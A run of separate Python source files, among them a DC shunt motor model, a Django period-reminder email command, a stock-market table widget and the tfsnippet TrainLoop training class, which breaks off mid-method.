Episode.objects.get(title__rei='alkali').link)
439111
import numpy as np from .dc_motor import DcMotor class DcShuntMotor(DcMotor): """The DcShuntMotor is a DC motor with parallel armature and exciting circuit connected to one input voltage. ===================== ========== ============= =========================================== Motor Parameter Unit Default Value Description ===================== ========== ============= =========================================== r_a Ohm 0.78 Armature circuit resistance r_e Ohm 25 Exciting circuit resistance l_a H 6.3e-3 Armature circuit inductance l_e H 1.2 Exciting circuit inductance l_e_prime H 0.0094 Effective excitation inductance j_rotor kg/m^2 0.017 Moment of inertia of the rotor ===================== ========== ============= =========================================== =============== ====== ============================================= Motor Currents Unit Description =============== ====== ============================================= i_a A Armature circuit current i_e A Exciting circuit current =============== ====== ============================================= =============== ====== ============================================= Motor Voltages Unit Description =============== ====== ============================================= u V Voltage applied to both circuits =============== ====== ============================================= ======== =========================================================== Limits / Nominal Value Dictionary Entries: -------- ----------------------------------------------------------- Entry Description ======== =========================================================== i_a Armature current i_e Exciting current omega Angular Velocity torque Motor generated torque u Voltage ======== =========================================================== """ HAS_JACOBIAN = True VOLTAGES = ['u'] # Motor parameter, nominal values and limits are based on the following DC Motor: # https://www.heinzmann-electric-motors.com/en/products/dc-motors/pmg-132-dc-motor _default_motor_parameter = { 'r_a': 16e-3, 'r_e': 4e-1, 'l_a': 19e-6, 'l_e_prime': 1.7e-3, 'l_e': 5.4e-3, 'j_rotor': 0.0025 } _default_nominal_values = dict(omega=300, torque=16.0, i=97, i_a=97, i_e=97, u=60, u_a=60, u_e=60) _default_limits = dict(omega=400, torque=38.0, i=210, i_a=210, i_e=210, u=60, u_a=60, u_e=60) _default_initializer = { 'states': {'i_a': 0.0, 'i_e': 0.0}, 'interval': None, 'random_init': None, 'random_params': (None, None) } def i_in(self, state): # Docstring of superclass return [state[self.I_A_IDX] + state[self.I_E_IDX]] def electrical_ode(self, state, u_in, omega, *_): # Docstring of superclass return super().electrical_ode(state, (u_in[0], u_in[0]), omega) def electrical_jacobian(self, state, u_in, omega, *_): mp = self._motor_parameter return ( np.array([ [-mp['r_a'] / mp['l_a'], -mp['l_e_prime'] / mp['l_a'] * omega], [0, -mp['r_e'] / mp['l_e']] ]), np.array([-mp['l_e_prime'] * state[self.I_E_IDX] / mp['l_a'], 0]), np.array([mp['l_e_prime'] * state[self.I_E_IDX], mp['l_e_prime'] * state[self.I_A_IDX]]) ) def get_state_space(self, input_currents, input_voltages): """ Calculate the possible normalized state space for the motor as a tuple of dictionaries "low" and "high". Args: input_currents: The converters possible output currents. input_voltages: The converters possible output voltages. Returns: tuple(dict,dict): Dictionaries defining if positive and negative values are possible for each motors state. """ lower_limit = 0 low = { 'omega': 0, 'torque': -1 if input_currents.low[0] == -1 else 0, 'i_a': -1 if input_currents.low[0] == -1 else 0, 'i_e': -1 if input_currents.low[0] == -1 else 0, 'u': -1 if input_voltages.low[0] == -1 else 0, } high = { 'omega': 1, 'torque': 1, 'i_a': 1, 'i_e': 1, 'u': 1, } return low, high def _update_limits(self, limits_d=None, nominal_d=None): # Docstring of superclass # R_a might be 0, protect against that r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a'] limit_agenda = { 'u': self._default_limits['u'], 'i_a': self._limits.get('i', None) or self._limits['u'] / r_a, 'i_e': self._limits.get('i', None) or self._limits['u'] / self.motor_parameter['r_e'], } super()._update_limits(limit_agenda)
439116
import tensorflow as tf mat1 = tf.constant([[4, 5, 6],[3,2,1]]) mat2 = tf.constant([[7, 8, 9],[10, 11, 12]]) # hadamard product (element wise) mult = tf.multiply(mat1, mat2) # dot product (no. of rows = no. of columns) dotprod = tf.matmul(mat1, tf.transpose(mat2)) with tf.Session() as sess: print(sess.run(mult)) print(sess.run(dotprod))
439128
import datetime from django.conf import settings from django.core.management.base import BaseCommand from django.template.loader import get_template from periods import models as period_models, email_sender, helpers class Command(BaseCommand): help = 'Notify users of upcoming periods' def _format_date(self, date_value): return date_value.strftime('%A %B %d, %Y') def handle(self, *args, **options): users = period_models.User.objects.filter( is_active=True, flow_events__isnull=False, statistics__isnull=False).exclude( send_emails=False).distinct() for user in users: today = period_models.today() upcoming_events = user.statistics.predicted_events if not upcoming_events: continue # The upcoming events are in date order, ovulation/period/ovulation/... expected_date = upcoming_events[1]['timestamp'] calendar_start_date = expected_date - datetime.timedelta(days=7) expected_in = (expected_date - today.date()).days expected_abs = abs(expected_in) if expected_abs == 1: day = 'day' else: day = 'days' context = { 'full_name': user.get_full_name(), 'today': self._format_date(today), 'expected_in': expected_abs, 'day': day, 'expected_date': self._format_date(expected_date), 'calendar_start_date': self._format_date(calendar_start_date), 'admin_name': settings.ADMINS[0][0], 'full_domain': helpers.get_full_domain(), } subject = '' if expected_in < 0: subject = "Period was expected %s %s ago" % (expected_abs, day) template_name = 'expected_ago' elif expected_in == 0: subject = "Period today!" template_name = 'expected_now' elif expected_in < 4: subject = "Period starting" template_name = 'expected_in' elif expected_in == user.luteal_phase_length: subject = "Ovulation today!" template_name = 'ovulating' if subject: plaintext = get_template('periods/email/%s.txt' % template_name) html = get_template('periods/email/%s.html' % template_name) email_sender.send(user, subject, plaintext.render(context), html.render(context))
439142
import sqlalchemy as sa from mealie.db.models.model_base import SqlAlchemyBase class Note(SqlAlchemyBase): __tablename__ = "notes" id = sa.Column(sa.Integer, primary_key=True) parent_id = sa.Column(sa.Integer, sa.ForeignKey("recipes.id")) title = sa.Column(sa.String) text = sa.Column(sa.String) def __init__(self, title, text) -> None: self.title = title self.text = text
439187
import unittest from loa.unit import Unit from loa.team import Team from loa.team import TeamExaminer def get_team(): return MyTeam("👑") class Pawn(Unit): HP = 20.0001 # Hit Points (health points) ATT = 10 # Attack ARM = 0 # Armor EVS = 0 # Evasion def __init__(self, team, name, pos): cls = __class__ super().__init__(team, name, pos, hp=cls.HP, att=cls.ATT, arm=cls.ARM, evs=cls.EVS) class Queen(Unit): HP = 100 # Hit Points (health points) ATT = 40 # Attack ARM = 6.6666 # Armor EVS = 0 # Evasion def __init__(self, team, name, pos): cls = __class__ super().__init__(team, name, pos, hp=cls.HP, att=cls.ATT, arm=cls.ARM, evs=cls.EVS) class MyTeam(Team): def initialize(self): for i in range(4): unit = Pawn(self, "Pawn%02d"%(i+1), i) self.units.append(unit) for i in range(6): unit = Queen(self, "Queen%02d"%(i+1), i+4) self.units.append(unit) def arrange(self, enemy: Team): for i in range(self.num_positions): e_att=0 e_pos=0 if self.units[i]!=None: if self.units[i].att==40: for j in range(enemy.num_positions): if enemy.units[j]!=None: if enemy.units[j].att>=e_att: if self.units[j]!=None: if self.units[j].att!=40: e_att=enemy.units[j].att e_pos=j elif self.units[j]==None: e_att=enemy.units[j].att e_pos=j if self.units[e_pos]!=None: temp=self.units[e_pos] self.units[e_pos]=self.units[i] self.units[e_pos].pos=e_pos self.units[i]=temp self.units[i].pos=i else: self.units[e_pos]=self.units[i] self.units[e_pos].pos=e_pos self.units[i]=None class TestTeam(unittest.TestCase): def test_team(self): team=MyTeam("👑") examiner=TeamExaminer() examiner.check(team) examiner.check(team) if __name__ == "__main__": unittest.main()
439191
from ....Common.DyStockCommon import * from ....Common.Ui.Basic.DyStockTableWidget import * class DyStockDataFocusInfoPoolWidget(DyStockTableWidget): """ focus info pool widget """ header = ['热点', # 若一只股票有多个热点,只取强度最大的作为其热点 '热点强度', # 此热点在市场中的强度 '热点涨幅(%)', # 被此热点追踪到的股票的平均涨幅 '热点涨停数', '热点涨停数占比(%)', '热点股票数', '龙头涨幅(%)', # 龙一,龙二,龙三的平均涨幅 '龙一', '龙二', '龙三', ] def __init__(self, dataViewer, date, focusInfoPool): super().__init__(dataViewer.eventEngine, name='热点', baseDate=date ) self._focusInfoPool = focusInfoPool self._dragonsMap = {} # {name: code} self._initUi() def _getDragons(self, focusInfo): data = [None]*3 for i, (code, name) in enumerate(focusInfo.dragons): data[i] = name self._dragonsMap[name] = code return data def _initUi(self): self.setWindowTitle('热点[{0}]'.format(self._baseDate)) self.setColNames(self.header) rows = [] focusList = sorted(self._focusInfoPool, key=lambda k: self._focusInfoPool[k].strength, reverse=True) for focus in focusList: focusInfo = self._focusInfoPool[focus] row = [focus, focusInfo.strength, focusInfo.increase, focusInfo.limitUpNbr, focusInfo.limitUpNbr/len(focusInfo.codes)*100, len(focusInfo.codes), focusInfo.dragonIncrease, ] row.extend(self._getDragons(focusInfo)) rows.append(row) self.fastAppendRows(rows, '热点涨幅(%)') #---------------------------------------------- 由子类根据自己的Table格式改写 ---------------------------------------------- def getDateCodeList(self): return None def getCodeList(self): return None def getCodePriceList(self): return None def getRightClickCodeDate(self): item = self.itemAt(self._rightClickPoint) if item is None: return None, None code = self._dragonsMap.get(item.text()) if code is None: return None, None return code, self._baseDate def getRightClickCodeName(self): item = self.itemAt(self._rightClickPoint) if item is None: return None, None name = item.text() code = self._dragonsMap.get(name) if code is None: return None, None return code, name def getCodeDate(self, item): code = self._dragonsMap.get(item.text()) if code is None: return None, None return code, self._baseDate
439210
from __future__ import print_function import copy import os import re import time import warnings from collections import OrderedDict from contextlib import contextmanager from logging import getLogger import six import tensorflow as tf from tfsnippet.dataflows import DataFlow from tfsnippet.utils import (StatisticsCollector, DisposableContext, humanize_duration, ETA, EventSource, TemporaryDirectory) from .checkpoint import CheckpointSavableObject, CheckpointSaver from .event_keys import EventKeys from .logging_ import summarize_variables, DefaultMetricFormatter, MetricLogger __all__ = ['TrainLoop'] EPOCH_TIME_METRIC = 'epoch_time' STEP_TIME_METRIC = 'step_time' TIME_METRIC_PATTERN = re.compile(r'.*(time|timer)$') TRAIN_LOOP_STATES_CKPT_NAME = '$$/tfsnippet_train_loop_states_variable' EARLY_STOPPING_STATES_CKPT_NAME = '$$/tfsnippet_early_stopping_states_variable' class TrainLoopStates(CheckpointSavableObject): """ Internal states of a :class:`TrainLoop`, which can be saved via a :class:`CheckpointSaver`. """ def __init__(self, epoch=0, step=0, best_valid_metric=None): self.epoch = epoch self.step = step self.best_valid_metric = best_valid_metric def get_state(self): return { 'epoch': self.epoch, 'step': self.step, 'best_valid_metric': self.best_valid_metric, } def set_state(self, state): self.epoch = state['epoch'] self.step = state['step'] self.best_valid_metric = state['best_valid_metric'] class TrainLoop(DisposableContext): """ Training loop object. This class provides a set of convenient methods for writing training loop. It is useful for maintaining epoch and step counters, logging training metrics, memorizing best parameters for early-stopping, etc. An example of using the :class:`TrainLoop`:: import tfsnippet as spt with spt.TrainLoop(param_vars, max_epoch=10, early_stopping=True) as loop: loop.print_training_summary() train_flow = spt.DataFlow.arrays([x, y], batch_size, shuffle=True) for epoch in loop.iter_epochs(): for step, (x, y) in loop.iter_steps(train_flow): step_loss = session.run( [loss, train_op], feed_dict={input_x: x, input_y: y} ) loop.collect_metrics(loss=step_loss) with loop.timeit('valid_time'): valid_loss = session.run( loss, feed_dict={input_x: test_x, input_y: test_y}) loop.collect_metrics(valid_loss=valid_loss) loop.print_logs() The event schedule of a :class:`TrainLoop` can be briefly described as:: # the main training loop events.fire(EventKeys.ENTER_LOOP, self) for epoch in self.iter_epochs(): events.fire(EventKeys.BEFORE_EPOCH, self) for step in self.iter_steps(...): events.fire(EventKeys.BEFORE_STEP, self) ... # execute the step events.reverse_fire(EventKeys.AFTER_STEP, self) events.reverse_fire(EventKeys.AFTER_EPOCH, self) events.fire(EventKeys.EXIT_LOOP, self) # when metrics are fed into the loop by :meth:`collect_metrics` def collect_metrics(self, metrics_dict=None, **kwargs): metrics_dict = merge(metrics_dict, kwargs) events.fire(EventKeys.METRICS_COLLECTED, self, metrics_dict) # when summaries are fed into the loop by :meth:`add_summary` def add_summary(self, summary): events.fire(EventKeys.SUMMARY_ADDED, self, summary) # when metric statistics have been printed as log def print_logs(self): ... events.fire(EventKeys.METRIC_STATS_PRINTED, self, metric_stats) events.fire(EventKeys.TIME_METRIC_STATS_PRINTED, self, time_metric_stats) Warning: If you use early-stopping along with checkpoint, there is one case which is very dangerous: you've already successfully done a training loop, and the early-stopping variables have been restored. But you then recover from the latest checkpoint and continue to train. In this case, the `param_vars` (which is covered by early-stopping) are restored to the best validation step, but the other variables and the internal states of :class:`TrainLoop` are recovered to the last step. Then you obtain a state mismatch, and the behaviour will be un-predictable after this recovery. """ def __init__(self, param_vars, var_groups=None, show_eta=True, print_func=print, max_epoch=None, max_step=None, metric_formatter=DefaultMetricFormatter(), # checkpoint related arguments checkpoint_dir=None, checkpoint_epoch_freq=None, checkpoint_max_to_keep=None, checkpoint_save_objects=None, restore_checkpoint=True, # summary related arguments summary_dir=None, summary_writer=None, summary_graph=None, summary_metric_prefix='metrics/', summary_skip_pattern=re.compile(r'.*(time|timer)$'), summary_commit_freqs=None, # validation and early-stopping related arguments valid_metric_name='valid_loss', valid_metric_smaller_is_better=None, early_stopping=False): """ Construct the :class:`TrainLoop`. Args: param_vars (list[tf.Variable] or dict[str, tf.Variable]): List or dict of variables, optimized during training. var_groups (None or list[str]): Variable groups, the prefixes of variable scopes. A hint for printing the variables summary. (default :obj:`None`) show_eta (bool): Whether or not to show ETA? (default :obj:`True`) print_func ((str) -> None): Function for printing log messages (calling ``print`` by default). An alternative of this argument may be ``getLogger(__name__).info``, such that the log messages will be printed via logging facilities. max_epoch (None or int or tf.Tensor or tf.Variable): The maximum epoch to run. If :obj:`None`, will run for infinite epochs. If ``1``, the epoch counter will be discarded in the output logs. (default :obj:`None`) max_step (None or int or tf.Tensor or tf.Variable): The maximum step to run. If :obj:`None`, will run for infinite steps. Note this limit applies for the total step counter, rather than the epoch-wise step counter. (default :obj:`None`) metric_formatter (MetricFormatter): The training metrics formatter. checkpoint_dir (str): If specified, will save checkpoint files to this directory, when :meth:`make_checkpoint()` is called. checkpoint_epoch_freq (int or None): If specified, will make checkpoint every this number of epochs. If not specified, you must call :meth:`make_checkpoint()` manually. checkpoint_max_to_keep (int or None): Maximum number of checkpoint versions to keep. If :obj:`None` or `0`, keep all versions. checkpoint_save_objects (dict[str, CheckpointSavableObject]): If specified, will save and restore the states of these objects. restore_checkpoint (bool or str): If :obj:`True`, will restore the latest checkpoint. If a str, it should be the path of a checkpoint file, and will restore from this checkpoint. If :obj:`False`, will not restore the from the checkpoint files (but will still save new checkpoints if `checkpoint_dir` if specified). summary_dir (str): Directory for writing TensorFlow summaries. Ignored if `summary_writer` is specified. summary_writer: TensorFlow summary writer for writing metrics. summary_metric_prefix (str): The prefix for the metrics committed to `summary_writer`. This will not affect the summaries added via :meth:`add_summary`. (default "") summary_graph: If specified, log the graph via `summary_writer`. summary_skip_pattern (str or regex): Metrics matching this pattern will be excluded from `summary_writer`. (default ".*(time|timer)$") summary_commit_freqs (dict[str, int] or None): If specified, a metric will be committed to `summary_writer` no more frequent than ``summary_commit_freqs[metric]``. (default :obj:`None`) valid_metric_name (str): Name of the validation metric. valid_metric_smaller_is_better (bool): Whether or not the smaller value is better for validation metric? If not specified, it will be inferred according to `valid_metric_name`: metric names with ``acc`` or ``accuracy`` as suffix imply :obj:`True`, while other names imply :obj:`False`. early_stopping (bool): Whether or not to do early-stopping? (default :obj:`False`) If :obj:`True`, early-stopping will be applied on `param_vars`, according to the validation metric. The variables will only be restored if the training loop is exited without any error or interruption, including the Ctrl+C KeyboardInterrupt. """ # regularize the parameters if not isinstance(param_vars, (dict, OrderedDict)): param_vars = list(param_vars) if isinstance(max_epoch, (tf.Variable, tf.Tensor)): max_epoch = int(max_epoch.eval()) if isinstance(max_step, (tf.Variable, tf.Tensor)): max_step = int(max_step.eval()) if checkpoint_dir is not None: checkpoint_dir = os.path.abspath(checkpoint_dir) if checkpoint_epoch_freq is not None: checkpoint_epoch_freq = int(checkpoint_epoch_freq) if checkpoint_epoch_freq < 1: raise ValueError( '`checkpoint_epoch_freq` must be a positive integer: ' 'got {}'.format(checkpoint_epoch_freq) ) if isinstance(restore_checkpoint, six.string_types): if early_stopping: raise ValueError( 'Currently `early_stopping = True` is not supported when ' 'a file path is specified for `restore_checkpoint`.' ) restore_checkpoint = os.path.abspath(restore_checkpoint) save_objects = dict(checkpoint_save_objects or ()) for key in (TRAIN_LOOP_STATES_CKPT_NAME, EARLY_STOPPING_STATES_CKPT_NAME): if key in save_objects: raise KeyError('Name is reserved for `checkpoint_save_objects`' ': {}'.format(key)) if summary_writer is not None: summary_dir = None own_summary_writer = False elif summary_dir is not None: summary_dir = os.path.abspath(summary_dir) own_summary_writer = True else: own_summary_writer = False smaller_is_better = valid_metric_smaller_is_better if smaller_is_better is None: smaller_is_better = not ( valid_metric_name.endswith('acc') or valid_metric_name.endswith('accuracy') ) # memorize the parameters self._param_vars = copy.copy(param_vars) self._var_groups = list(var_groups) if var_groups else None self._print_func = print_func self._show_eta = show_eta self._max_epoch = max_epoch self._max_step = max_step self._metric_formatter = metric_formatter self._summary_dir = summary_dir self._summary_writer = summary_writer self._summary_metric_prefix = summary_metric_prefix self._summary_graph = summary_graph self._summary_skip_pattern = summary_skip_pattern self._summary_commit_freqs = dict(summary_commit_freqs or ()) self._own_summary_writer = own_summary_writer self._use_early_stopping = early_stopping self._valid_metric_name = valid_metric_name self._valid_metric_smaller_is_better = smaller_is_better # the event source self._events = EventSource([ EventKeys.ENTER_LOOP, EventKeys.EXIT_LOOP, EventKeys.BEFORE_EPOCH, EventKeys.AFTER_EPOCH, EventKeys.BEFORE_STEP, EventKeys.AFTER_STEP, EventKeys.METRICS_COLLECTED, EventKeys.TIME_METRICS_COLLECTED, EventKeys.METRIC_STATS_PRINTED, EventKeys.TIME_METRIC_STATS_PRINTED, EventKeys.SUMMARY_ADDED, ]) # the restorable train loop states self._states = TrainLoopStates() # initialize the checkpoint saver self._checkpoint_dir = checkpoint_dir self._checkpoint_epoch_freq = checkpoint_epoch_freq self._restore_checkpoint = restore_checkpoint self._checkpoint_saver = None if checkpoint_dir: getLogger(__name__).debug( 'Global variables to save at checkpoints: %s', tf.global_variables() ) save_objects[TRAIN_LOOP_STATES_CKPT_NAME] = self._states self._checkpoint_saver = CheckpointSaver( tf.global_variables(), objects=save_objects, save_dir=os.path.join(checkpoint_dir, 'checkpoint'), max_to_keep=checkpoint_max_to_keep, save_meta=False ) # the checkpoint saver for early stopping # if checkpoint_dir is None, we postpone the initialization until # enter the loop. self._early_stopping_saver = None self._early_stopping_temp_dir = None # type: TemporaryDirectory if checkpoint_dir is not None and self._use_early_stopping: self._early_stopping_saver = CheckpointSaver( self._param_vars, save_dir=os.path.join(checkpoint_dir, 'early_stopping'), max_to_keep=2, save_meta=False ) # euphemeral train loop states self._eta = None self._step_metrics = None # type: MetricLogger self._epoch_metrics = None # type: MetricLogger self._within_epoch = False self._within_step = False self._steps_per_epoch = None # average steps per epoch self._is_best_valid_metric = False self._epoch_start_time = None self._step_start_time = None # the active data flow of current epoch self._data_flow = None # type: DataFlow self._step_data = None # the data of the current step def _enter(self): # open the summary writer if required if self._summary_dir is not None: self._summary_writer = tf.summary.FileWriter( self._summary_dir, graph=self._summary_graph) # create the metric accumulators self._step_metrics = MetricLogger(formatter=self._metric_formatter) self._epoch_metrics = MetricLogger( summary_writer=self._summary_writer, summary_metric_prefix=self._summary_metric_prefix, summary_skip_pattern=self._summary_skip_pattern, summary_commit_freqs=self._summary_commit_freqs, formatter=self._metric_formatter ) # create the early-stopping saver if required if self._use_early_stopping: if self._early_stopping_saver is None: self._early_stopping_temp_dir = TemporaryDirectory() dir_path = self._early_stopping_temp_dir.__enter__() self._early_stopping_saver = CheckpointSaver( self._param_vars, save_dir=dir_path, max_to_keep=2, save_meta=False, ) # restore the checkpoint if self._checkpoint_saver is not None: checkpoint_file = None if isinstance(self._restore_checkpoint, six.string_types): checkpoint_file = str(self._restore_checkpoint) elif self._restore_checkpoint: checkpoint_file = self._checkpoint_saver.latest_checkpoint() if checkpoint_file: self._checkpoint_saver.restore(checkpoint_file) self.println( 'Resume training: epoch {}, step {}, from checkpoint {}'. format(self.epoch, self.step, checkpoint_file) ) # initialize the eta flags self._eta = ETA(take_initial_snapshot=False) progress = self.get_progress() if progress is not None: self._eta.take_snapshot(progress) # trigger the event self.events.on(EventKeys.ENTER_LOOP, self) # return self as the context object return self def _exit(self, exc_type, exc_val, exc_tb): try: # close the summary writer if self._own_summary_writer: self._summary_writer.close() self._summary_writer = None self._own_summary_writer = False # restore the early-stopping variables if no error if self._early_stopping_saver is not None: if exc_type is None: es_latest = self._early_stopping_saver.latest_checkpoint() if es_latest is None: # pragma: no cover warnings.warn( 'Early-stopping has never been triggered! ' 'The variables will keep their latest values. ' 'Did you forget to add corresponding metric?' ) else: self._early_stopping_saver.restore(es_latest) self.println('Restore early-stopping parameters: ' 'from checkpoint {}'.format(es_latest)) self._early_stopping_saver = None else: # pragma: no cover warnings.warn( 'Early-stopping variables are not restored, because ' 'an error or an interruption has occurred.' ) finally: try: if self._early_stopping_temp_dir is not None: self._early_stopping_temp_dir.__exit__( exc_type, exc_val, exc_tb ) self._early_stopping_temp_dir = None except Exception: getLogger(__name__).warning( 'Failed to cleanup early-stopping temporary directory.', exc_info=True ) # clear status self._steps_per_epoch = None self._eta = None # trigger the event self.events.on(EventKeys.EXIT_LOOP, self) def _commit_epoch_stop_time(self): if self._epoch_start_time is not None: duration = time.time() - self._epoch_start_time self.collect_metrics(metrics={EPOCH_TIME_METRIC: duration}) self._epoch_start_time = None def _commit_step_stop_time(self): if self._step_start_time is not None: duration = time.time() - self._step_start_time self.collect_metrics(metrics={STEP_TIME_METRIC: duration}) self._step_start_time = None def get_progress(self): """ Get the progress of training. Returns: float or None: The progress in range ``[0, 1]``, or None if the progress cannot be estimated. """ max_step = self.max_step if max_step is None and self.max_epoch is not None and \ self._steps_per_epoch is not None: max_step = self.max_epoch * self._steps_per_epoch if max_step: if self._within_step and self._step_start_time is not None: # _step_start_time != None, indicating the step not finished return (self.step - 1.) / max_step else: return float(self.step) / max_step elif self.max_epoch is not None: if self._within_epoch and self._epoch_start_time is not None: # _epoch_start_time != None, indicating the epoch not finished return (self.epoch - 1.) / self.max_epoch else: return float(self.epoch) / self.max_epoch @property def param_vars(self): """Get the trainable parameter variables.""" return self._param_vars @property def var_groups(self): """Get the variable groups.""" return self._var_groups @property def max_epoch(self): """Get or set the max value for epoch counter.""" return self._max_epoch @max_epoch.setter def max_epoch(self, value): self._max_epoch = int(value) @property def max_step(self): """Get or set the max value for global step counter.""" return self._max_step @max_step.setter def max_step(self, value): self._max_step = int(value) @property def summary_writer(self): """Get the summary writer instance.""" return self._summary_writer @property def events(self): """ Get the event source. Returns: EventSource: The event source. """ return self._events @property def epoch(self): """Get the epoch counter (starting from 1).""" return self._states.epoch @property def step(self): """Get the global step counter (starting from 1).""" return self._states.step @property def step_data(self): """Get the data of current step.""" return self._step_data @property def use_early_stopping(self): """Whether or not to adopt early-stopping?""" return self._use_early_stopping @property def valid_metric_name(self): """Get the name of the validation metric.""" return self._valid_metric_name @property def valid_metric_smaller_is_better(self): """Whether or not the smaller value is better for validation metric?""" return self._valid_metric_smaller_is_better @property def best_valid_metric(self): """Get the best valid metric.""" return self._states.best_valid_metric @property def within_epoch(self): """Whether or not an epoch is open?""" return self._within_epoch @property def within_step(self): """Whether or not a step is open?""" return self._within_step def make_checkpoint(self): """ Make a checkpoint. This method must be called within an eopch or a step context. For example:: for epoch in loop.iter_epochs(): for [x] in loop.iter_steps(train_data): ... if epoch % 100 == 0: loop.make_checkpoint() """ if not self._checkpoint_saver: raise RuntimeError('Checkpoint directory is not configured.') self._checkpoint_saver.save(self._states.step) def iter_epochs(self): """ Iterate through the epochs. This method can only be called when there's no other epoch loop is being iterated. Furthermore, after exiting this loop, both the epoch metrics as well as the step metrics will be cleared. If `max_epoch` is configured, it will stop at it. Yields: int: The epoch counter (starting from 1). """ def loop_condition(): return ( (self._max_epoch is None or self.epoch < self._max_epoch) and (self._max_step is None or self.step < self._max_step) ) self._require_entered() if self._within_epoch: raise RuntimeError('Another epoch loop has been opened') try: while loop_condition(): self._states.epoch += 1 self._within_epoch = True self._epoch_start_time = time.time() self.events.fire(EventKeys.BEFORE_EPOCH, self) yield self.epoch self.events.reverse_fire(EventKeys.AFTER_EPOCH, self) self._commit_epoch_stop_time() self._steps_per_epoch = float(self.step) / self.epoch # do checkpoint if configured if self._checkpoint_epoch_freq is not None and \ self.epoch % self._checkpoint_epoch_freq == 0: self.make_checkpoint() finally: self._within_epoch = False self._epoch_start_time = None self._step_metrics.clear() self._epoch_metrics.clear() self._is_best_valid_metric = False def iter_steps(self, data_generator=None): """ Iterate through the steps. This method can only be called when there's no other step loop is being iterated, and an epoch loop is active. Args: data_generator: Optional iterable data to be yielded at every step. This is required if `max_step` is not configured, so as to prevent an infinite step loop. Yields: int or (int, any): The global step counter (starting from 1), or the tuple of ``(step counter, batch data)`` if `data_generator` is specified. """ def loop_condition(): return self._max_step is None or self.step < self._max_step self._require_entered() if not self._within_epoch: raise RuntimeError('Step loop must be opened within active epoch ' 'loop') if self._within_step: raise RuntimeError('Another step loop has been opened') if self._max_step is None and data_generator is None: raise RuntimeError('`data_generator` is required when `max_step` ' 'is not configured, so as to prevent an ' 'unstoppable step loop') try: if data_generator is not None: if isinstance(data_generator, DataFlow): data_flow = data_generator else: def iter_factory(): if data_gen[0] is not None: for batch in data_gen[0]: yield batch data_gen[0] = None # force to use data_generator once data_gen = [data_generator] data_flow = DataFlow.iterator_factory(iter_factory) self._data_flow = data_flow while loop_condition(): # prepare for the step data if self._data_flow is None: yield_obj = self.step + 1 step_data = None else: try: step_data = self._data_flow.next_batch() except StopIteration: break yield_obj = self.step + 1, step_data # yield this step self._states.step += 1 self._within_step = True self._step_data = step_data self._step_start_time = time.time() self.events.fire(EventKeys.BEFORE_STEP, self) try: yield yield_obj except StopIteration: # pragma: no cover # might be caused by call to ``data_flow.next_batch()`` break self.events.reverse_fire(EventKeys.AFTER_STEP, self) self._commit_step_stop_time() finally: self._within_step = False self._step_start_time = None self._data_flow = None self._step_data = None def _require_context(self): self._require_entered() if not self._within_epoch and not self._within_step: raise RuntimeError('An epoch or a step loop is expected, but ' 'neither has been opened') @contextmanager def timeit(self, metric_name): """ Open a context for timing. Args: metric_name (str): Store the timing result in metric of this name. Note that `metric_name` must end with ``time`` or ``timer``, otherwise by default the time values will not be formatted as human readable strings. """ self._require_context() start_time = time.time() yield duration = time.time() - start_time self._collect_metrics( {metric_name: duration}, EventKeys.TIME_METRICS_COLLECTED) @contextmanager def metric_collector(self, metric_name): """ Get a :class:`~tfsnippet.utils.StatisticsCollector` for metric. The mean value of the collected metrics will be added to summary after exiting the context. Other statistics will be discarded. Args: metric_name (str): The name of this metric. Yields: StatisticsCollector: The collector for metric values. """ self._require_context() acc = StatisticsCollector() yield acc if acc.has_value: self.collect_metrics(metrics={metric_name: acc.mean}) def _collect_metrics(self, metrics, event_key): self._require_context() # update the metrics self._epoch_metrics.collect_metrics(metrics, global_step=self.step) if self._within_step: self._step_metrics.collect_metrics(metrics, global_step=self.step) self.events.fire(event_key, self, metrics) # update the validation metric def update_valid_metric(d): v = d.get(self.valid_metric_name) if v is not None: if self.best_valid_metric is None or \ (self._valid_metric_smaller_is_better and v < self.best_valid_metric) or \ (not self._valid_metric_smaller_is_better and v > self.best_valid_metric): # we've met a new best metric self._states.best_valid_metric = v self._is_best_valid_metric = True # early-stopping save variables if self._early_stopping_saver is not None: self._early_stopping_saver.save(global_step=self.step) else: self._is_best_valid_metric = False if self.valid_metric_name: if metrics: update_valid_metric(metrics) def collect_metrics(self, metrics=None, **kwargs): """ Add metric values. This method must be called when there's at least an active epoch loop. It will add metrics to the epoch metrics collector, and if there's an active step loop, it will also add metrics to the step metrics collector. If `summary_writer` is configured, it will also write the metrics as summaries onto disk. Furthermore, if `valid_metric_name` is configured, it will also perform early-stopping. Args: metrics (dict[str, float or np.ndarray]): Metric values as dict. **kwargs: Metric values, specified as named arguments. """ if metrics is None: metrics = {} elif metrics is not None and not isinstance(metrics, dict): raise TypeError('`metrics` should be a dict') else: metrics = dict(metrics) metrics.update(kwargs) self._collect_metrics(metrics, EventKeys.METRICS_COLLECTED) def add_summary(self, summary): """ Add a summary object, with ``self.step`` as `global_step`. Args: summary (tf.summary.Summary or bytes): TensorFlow summary object, or serialized summary. """ self._require_entered() self._summary_writer.add_summary(summary, global_step=self.step) self.events.fire(EventKeys.SUMMARY_ADDED, self, summary) def get_eta(self): """ Get the estimated time ahead (ETA). Returns: float or None: The estimated time ahead in seconds, or None if not available. """ progress = self.get_progress() if progress is not None: return self._eta.get_eta(progress) def println(self, message, with_tag=False): """ Print `message` via `print_function`. Args: message (str): Message to be printed. with_tag (bool): Whether or not to add the epoch & step tag? (default :obj:`False`) """ if with_tag: def format_tag(v, max_v, name): if max_v is not None: return '{} {}/{}'.format(name, v, max_v) else: return '{} {}'.format(name, v) if not self._within_step and not self._within_epoch: self._require_context() tags = [] if self._max_epoch != 1: tags.append(format_tag(self.epoch, self._max_epoch, 'Epoch')) tags.append(format_tag(self.step, self._max_step, 'Step')) if self._show_eta: eta = self.get_eta() if eta is not None: tags.append('ETA {}'.format(humanize_duration(eta))) message = '[{}] {}'.format(', '.join(tags), message) self._print_func(message) def print_training_summary(self): """ Print the training summary. The training summary include the following content: 1. Execution environment. 2. Parameters to be optimized during training. """ self._require_entered() self.println(summarize_variables( variables=self._param_vars, title='Trainable Parameters', other_variables_title='Other Parameters', groups=self.var_groups )) self.println('') def print_logs(self): """ Print the training logs. This method will print the collected metrics. If there's an active step loop, it will print metrics from the step metrics collector. Otherwise if there's only an epoch loop, it will print metrics from the epoch metrics accumulator. Note it must be called at the end of an epoch or a step. This is because the metrics of corresponding loop context will be cleared after the logs are printed. Moreover, the epoch or step timer will be committed as metric immediately when this method is called, before printing the logs. """ self._require_entered() metrics = None if self._within_step: self._commit_step_stop_time() metrics = 